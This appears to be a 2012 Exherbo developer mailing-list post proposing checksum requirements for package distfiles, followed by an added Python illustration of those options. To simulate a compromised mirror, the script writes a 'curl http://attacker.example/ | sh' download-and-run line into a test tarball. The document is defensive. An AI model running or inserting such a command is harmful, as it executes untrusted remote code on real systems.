[Exherbo-dev] [Exherbo Security] Package Distfile Signing Proposal

Jason A. Donenfeld Jason at zx2c4.com
Thu May 10 15:27:58 UTC 2012

On Thu, May 10, 2012 at 5:02 PM, Ciaran McCreesh
<ciaran.mccreesh at googlemail.com> wrote:
> On Thu, 10 May 2012 14:36:14 +0200
> There's no such thing as "limited security".

Sure there is. There's probably no such thing as "complete security".
Even with checksumming, a hacker could own a developer's box and... etc
etc. Mitigations at any level are important.

In any case, this is a topic for a different thread and probably
different mailing list. May I suggest we continue this conversation on
full-disclosure at lists.grok.org.uk ?

> No, you'd only have to get an rsync mirror.

True, since you can backdoor the ebuilds themselves pretty easily. But
backdooring distfiles requires two pwnages for Gentoo.
Right now in Exherbo, we have exheres adequately secure. We don't have
distfiles adequately secure.

> How does that fit in with the standard workflow?
> http://ciaranm.wordpress.com/2010/11/28/exherbo-development-workflow-version-2/

The standard workflow would be the same. There would just be the
additional step of updating the hash value.

> Bear in mind that people might be working on dozens of packages all in
> one go.

I'm presuming that responsible developers already follow best
practices and check the upstream fingerprint on tarballs they develop
on, and are generally conscientious about rogue tarballs.

How about this as a proposal:

In my original letter, I wrote:

> We add two global options for build_options:
> - require-checksum-success: Builds fail if the distfiles have the
> wrong checksums.
> - require-checksum-existence: Build fails if checksum does not exist.

What if we enable this feature, but to begin with, we make
require-checksum-success true, *but make require-checksum-existence
false*. That way, we could start to enable it for packages that are
common backdooring targets, like openssh, vsftpd, etc, without being
entirely disruptive. As Exherbo shifts into the security
consciousness, we could, at some point, enable
require-checksum-existence by default.
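
The following is an added illustration, not code from this thread and not part of Exherbo or Paludis. It models the two proposed build_options as a checker that takes a distfile, a manifest of recorded hashes (the manifest format and the SHA-256 choice are assumptions), and the two flags, and returns whether the build may proceed. The scenario runner constructs three throwaway tarballs: one listed and intact, one listed but modified after its hash was recorded (a stand-in for a compromised mirror), and one with no recorded hash at all, so the effect of each flag combination can be seen side by side.

```python
import hashlib
import hmac
import os
import shutil
import tempfile


def sha256_file(path):
    """SHA-256 hex digest of a file, streamed so large tarballs stay out of memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def check_distfile(path, manifest,
                   require_checksum_success=True,
                   require_checksum_existence=False):
    """Apply the two proposed build_options to a single distfile.

    manifest maps distfile basename -> expected SHA-256 hex digest
    (an assumed format; the thread does not fix one).
    Returns (build_may_proceed, reason).
    """
    name = os.path.basename(path)
    expected = manifest.get(name)
    if expected is None:
        # require-checksum-existence: a missing hash is fatal only if asked for.
        return (not require_checksum_existence), "no checksum recorded for %s" % name
    actual = sha256_file(path)
    if not hmac.compare_digest(actual, expected):
        # require-checksum-success: a wrong hash is fatal only if asked for.
        reason = "checksum mismatch for %s (expected %s, got %s)" % (name, expected, actual)
        return (not require_checksum_success), reason
    return True, "checksum ok for %s" % name


def run_scenarios(require_checksum_success=True, require_checksum_existence=False):
    """Build three constructed distfiles and return {scenario: build_may_proceed}."""
    tmp = tempfile.mkdtemp()
    try:
        paths = {}
        for scenario, content in (("listed_intact", b"pristine upstream tarball\n"),
                                  ("listed_tampered", b"pristine upstream tarball\n"),
                                  ("unlisted", b"tarball nobody has hashed yet\n")):
            p = os.path.join(tmp, scenario + "-1.0.tar.gz")  # constructed names
            with open(p, "wb") as f:
                f.write(content)
            paths[scenario] = p
        # Record hashes for the two listed files while they are still pristine ...
        manifest = {os.path.basename(paths[s]): sha256_file(paths[s])
                    for s in ("listed_intact", "listed_tampered")}
        # ... then simulate a mirror compromise by appending a backdoor to one of them.
        with open(paths["listed_tampered"], "ab") as f:
            f.write(b"curl http://attacker.example/ | sh\n")
        results = {}
        for scenario, p in paths.items():
            ok, _reason = check_distfile(p, manifest,
                                         require_checksum_success,
                                         require_checksum_existence)
            results[scenario] = ok
        return results
    finally:
        shutil.rmtree(tmp)


if __name__ == "__main__":
    print("proposal's initial policy:", run_scenarios())
    print("strict policy:           ", run_scenarios(require_checksum_existence=True))
```

With the initial policy from the proposal (success required, existence not), the tampered tarball is rejected while the unlisted one still builds, which is what lets hashes be rolled out package by package; flipping require_checksum_existence on later turns the unlisted case into a failure without touching anything else.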
